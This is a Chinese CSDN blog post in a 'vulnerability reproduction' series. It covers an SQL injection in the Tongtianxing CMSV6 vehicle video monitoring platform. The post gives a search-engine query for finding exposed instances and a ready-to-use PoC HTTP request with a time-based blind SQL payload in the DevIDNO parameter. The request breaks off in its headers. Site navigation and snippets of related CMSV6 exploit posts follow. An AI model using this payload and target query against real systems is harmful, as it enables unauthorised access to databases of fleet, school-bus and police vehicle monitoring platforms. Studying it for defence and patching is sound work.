【漏洞复现】通天星CMSV6车载监控平台SQL注入漏洞

最新推荐文章于 2024-06-16 19:43:17 发布
最新推荐文章于 2024-06-16 19:43:17 发布
阅读量686 收藏 9
点赞数 7
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/135410529
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

Nx01 产品简介

        深圳市通天星科技有限公司,是一家以从事计算机、通信和其他电子设备制造业为主的企业。通天星车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交通上。

Nx02 漏洞描述

        通天星车载视频监控平台软件StandardApiAction_vehicleTTS.action文件DevIDNO参数存在SQL注入漏洞,攻击者可以通过此漏洞获取数据库信息。

Nx03 产品主页

hunter-query: web.body="/808gps/"

Nx04 漏洞复现

POC:

GET /StandardApiAction_vehicleTTS.action?DevIDNO=5'and(select*from(select+sleep(3))a/**/union/**/select+1)='&Flag=4&Text=rrrrrvvv HTTP/1.1
Host: {
  {Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exc
了解本专栏 已下架不支持订阅
晚风不及你ღ
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录

已下架不支持订阅

天星CMSV6车载视频监控平台 SQL注入漏洞复现
0xSec
01-06 1176
天星CMSV6车载视频监控平台StandardApiAction_vehicleTTS.action接口处存在SQL注入漏洞,未经身份认证的攻击者可以过此漏洞获取数据库敏感信息,深入利用可获取服务器权限。
漏洞复现天星CMSV6车载监控平台vehicleTTS SQL注入漏洞
晚风不及你
04-25 53
天星CMSV6车载视频监控平台StandardApiAction_vehicleTTS.action文件DevIDNO参数存在SQL注入漏洞,攻击者可以过此漏洞获取数据库信息。
漏洞复现天星CMSV6 车载定位监控平台SQL注入漏洞
weixin_52204925的博客
03-16 953
天星CMSV6车载定位监控平台 downloadLogger.action?ids接口处存在SQL注入漏洞,恶意攻击者可能会利用该漏洞获取敏感信息,从而导致服务器失陷
漏洞复现天星CMSV6信息泄露漏洞
rm -rf *
11-10 248
东莞市天星软件科技有限公司(天星CMSV6)拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,天星-CMSV6 list 存在信息泄露漏洞
天星CMSV6车载定位监控平台 SQL注入漏洞复现(XVE-2023-23744)
0xSec
03-15 844
漏洞是由于天星CMSV6车载定位监控平台/run_stop/delete.do;downloadLogger.action接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可配合任意文件读取获取网站绝对路径写入后门文件进行远程代码执行。
漏洞复现天星CMSV6车载监控平台Login弱口令漏洞
晚风不及你
04-25 40
天星CMSV6车载视频监控平台存在弱口令漏洞,导致攻击者过此漏洞登录系统获取敏感信息。
天星CMSV6车载定位监控平台 SQL注入漏洞复现(含nuclei-poc)
m0_50797689的博客
03-18 325
天星CMSV6车载定位监控平台 SQL注入漏洞复现(含nuclei-poc)
CSZ CMS 1.2.X sql注入漏洞
09-07
# (CVE-2019-13086)CSZ CMS 1.2.Xsql注入漏洞 ## 一、漏洞简介 CSZ CMS是一套基于PHP的开源内容管理系统(CMS)。 CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞...
极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf
03-22
在极致CMS中,我们发现了多个SQL注入漏洞,这些漏洞可以让攻击者轻松地访问或修改数据库中的数据。 例如,在FrPHP/lib/Controller.php文件中的frparam()函数中,我们发现了一个SQL注入漏洞。该函数用于获取URL参数...
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL注入漏洞后台演示,利用 sqlmap与burpsuit注入,需具备php基础
gamblingmaster2020#0day-1#74cms v5.0.1前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
74cms v4.2.X任意文件读取漏洞
09-06
影响版本: 74cms v4.2. 74cms v4.2 74cms v4.2.3 74cms v5.0.1 有任意删除文件漏洞和SQL漏洞,有poc的复现过程。
2024中国网络安全产品用户调查报告(发布版)
2301_76786857的博客
06-12 703
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
网络安全实战:剖析ThinkPHP 5.1.X反序列化漏洞
weixin_43822401的博客
06-16 416
ThinkPHP作为广泛使用的PHP开发框架,在5.1.X版本中存在一个严重的反序列化漏洞。该漏洞允许攻击者过构造特定的序列化字符串,实现在服务器上执行任意代码,从而可能导致数据泄露、服务中断等安全事件。
【网络安全的神秘世界】AppScan安装及使用指南
最新发布
weixin_54750312的博客
06-16 227
动态的web扫描,爬取目标网站的接口、链接,过扫描器自身的扫描逻辑去发送一些特定的http请求数据包,根据服务端的返回内容来判断存在哪些漏洞。AppScan是一种综合型漏洞扫描工具,采用SaaS解决方案,它将所以测试功能整合到一个服务中,避免了因操作系统不同带来的安装问题。ASoC使用安装在应用程序上的代理,监控所有的交互流量,在应用程序运行期间识别安全漏洞。checkmark:非编译扫描,代码是什么样它就什么样。fortify:编译扫描,需要一定的环境依赖。动态分析(DAST)——黑盒扫描。
网络安全(补充)
m0_62207482的博客
06-16 509
网络蠕虫是一种具有自我复制和传播能力、可独立自动运行的恶意程序,属于主动传播。属于被动传播的有计算机病毒、特洛伊木马、逻辑炸弹、细菌、恶意脚本、恶意Active X控件、间谍软件等 文件型病毒系计算机病毒德意志,主要过感染计算机中的可执行文件(.exe)和命令文件(.com)。把所有过操作系统的文件系统进行感染的病毒都称作文件病毒。可以感染所有标准的DOS可执行文件:包括批处理文件、DOS下的可加载驱动程序(.SYS)文件以及普的COM/EXE可执行文件。由于HTML文件无法嵌入二进制执行代码,且是
cmsv6 sql注入漏洞
04-26
CMSv6是一个广泛使用的内容管理系统,而SQL注入漏洞是一种常见的Web应用程序漏洞。当Web应用程序没有正确过滤用户输入或使用不安全的查询方法时,攻击者可以利用SQL注入漏洞向数据库发送恶意的SQL代码,从而获取、修改或删除数据库中的数据。 CMSv6SQL注入漏洞可能导致以下风险: 1. 数据泄露:攻击者可以过注入恶意的SQL代码来获取数据库中的敏感信息,如用户账号、密码等。 2. 数据篡改:攻击者可以修改数据库中的数据,包括修改用户信息、文章内容等。 3. 数据删除:攻击者可以过注入删除语句删除数据库中的数据,导致数据的不可恢复性损失。 为了防止SQL注入漏洞,开发者应该采取以下措施: 1. 使用参数化查询或预编译语句来处理用户输入,确保输入数据经过正确的转义和过滤。 2. 对于动态生成的SQL查询,避免直接拼接用户输入到查询语句中,而是使用参数化查询。 3. 限制数据库用户的权限,确保数据库用户只能执行必要的操作,并且不允许直接执行危险的SQL语句。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值